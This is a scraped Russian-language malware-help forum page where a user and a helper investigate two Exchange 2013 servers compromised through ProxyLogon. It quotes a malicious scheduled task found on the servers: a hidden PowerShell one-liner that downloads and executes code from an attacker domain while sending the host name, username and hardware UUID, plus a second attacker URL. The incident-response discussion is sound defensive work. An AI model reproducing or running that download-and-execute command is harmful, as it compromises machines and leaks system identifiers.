Выбрать дату в календареВыбрать дату в календаре

1 2 3 4 5 6 7 8 9 10 11 ... 14 След.
MS Exchange 2013 поймали заразу на двух серверах. Прошу проверить., ProxyLogon
[QUOTE]santy написал:
если будет возможность перегрузить сервера,
выполните в uVS вначале твик 39, потом перегрузить систему, потом еще раз снять в uVS образы автозапуска, для проверки,
возможно получиться увидеть, кто  эти задачи создает.
(при условии, конечно, если они будут воссозданы)

  [/QUOTE]
твик 39 что то найти не могу, найду.
Еще вопрос. По той же проблеме. После этой бяки вот такое вылетает у пользователей (см. скриншот)
Изменено: Владимир Шариков - 17.03.2021 18:17:11
MS Exchange 2013 поймали заразу на двух серверах. Прошу проверить., ProxyLogon
[QUOTE]santy написал:
[QUOTE] Владимир Шариков написал:
[QUOTE] santy написал:
[QUOTE] Владимир Шариков написал:
Положу сюда сразу два образа двух серверов.[/QUOTE]
можно и второй образ положить[/QUOTE]
[/QUOTE]
по второму серверу:
это нормальный софт?
C:\PROGRAM FILES\WIN-ACME\WACS.EXE
--RENEW --BASEURI "[URL=HTTPS://ACME-V02.API.LETSENCRYPT.ORG/"]HTTPS://ACME-V02.API.LETSENCRYPT.ORG/&quot[/URL];[/QUOTE]
Да, это сертификаты обновляет.
MS Exchange 2013 поймали заразу на двух серверах. Прошу проверить., ProxyLogon
[QUOTE]santy написал:
[QUOTE] Владимир Шариков написал:
Положу сюда сразу два образа двух серверов.[/QUOTE]
можно и второй образ положить[/QUOTE]
MS Exchange 2013 поймали заразу на двух серверах. Прошу проверить., ProxyLogon
[QUOTE]santy написал:
сервер можно будет перегрузить (скриптом)?[/QUOTE]
Через пол часа можно будет.
[QUOTE]santy написал:
[QUOTE] Владимир Шариков написал:
Что этот код делает? Стоит ли боятся "Последствий" этой бяки?[/QUOTE]
шифрованный код. понятно, что расшифровывается на вашей системе, или наоборот в зашифрованном виде уходит в сеть[/QUOTE]
Как его возможно расшифровать? Нужно понять что хакер хотел добиться. Как мы поняли хекер воспользовался уявимостью, при обращение к екчанджу происходит срабатывания нескольких скриптов (каких мы не знаем). Но заметили что меняются ДНСы сервера.
[QUOTE]santy написал:
есть задачи, через которые возможно пытаются перехватить пароли.
[QUOTE]C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE
-W HIDDEN -C I`EX ([SYSTEM.TEXT.ENCODING]::ASCII.GETSTRING((NEW-OBJECT NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'DOWN.'+'SQLNETCAT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT WIN32_COMPUTERSYSTEMPRODUCT).UUID,(RANDOM))-JOIN'*'))))[/QUOTE]
[/QUOTE]
Вот это слово "Возможно" пугает ))) Тут как я понимаю срабатывает Имя ПК, Индефикатор, и имя пользователя.
MS Exchange 2013 поймали заразу на двух серверах. Прошу проверить., ProxyLogon
Вот это не ясно [URL=http://t.netcatkit.com/a.jsp?_20210317][S]http://t.netcatkit.com/a.jsp?_20210317[/S][/URL][S]?[/S] :
Скрытый текст
Что этот код делает? Стоит ли боятся "Последствий" этой бяки?
MS Exchange 2013 поймали заразу на двух серверах. Прошу проверить., ProxyLogon
Да.
MS Exchange 2013 поймали заразу на двух серверах. Прошу проверить., ProxyLogon
Здравствуйте. MS Exchange 2013 поймали заразу на двух серверах. Прошу проверить. Удалять сам не стал из "шидулера", реестра. Обновления на двух серверах уже установили, закрывающую уязвимость. Если будут еще какие то комментарии напишите пожалуйста.
Положу сюда сразу два образа двух серверов. Если необходимо могу тему скопировать, по одному образу выложу.
Изменено: Владимир Шариков - 18.03.2021 17:16:52
Непонятные службы, Службы которые непонятные
Извините что долго не отвечал.
И таких много служб... Как то подозрительно!!!
Непонятные службы, Службы которые непонятные
ага
Непонятные службы, Службы которые непонятные
Здравствуйте. Службы непонятные... Нормально ли всё?
1 2 3 4 5 6 7 8 9 10 11 ... 14 След.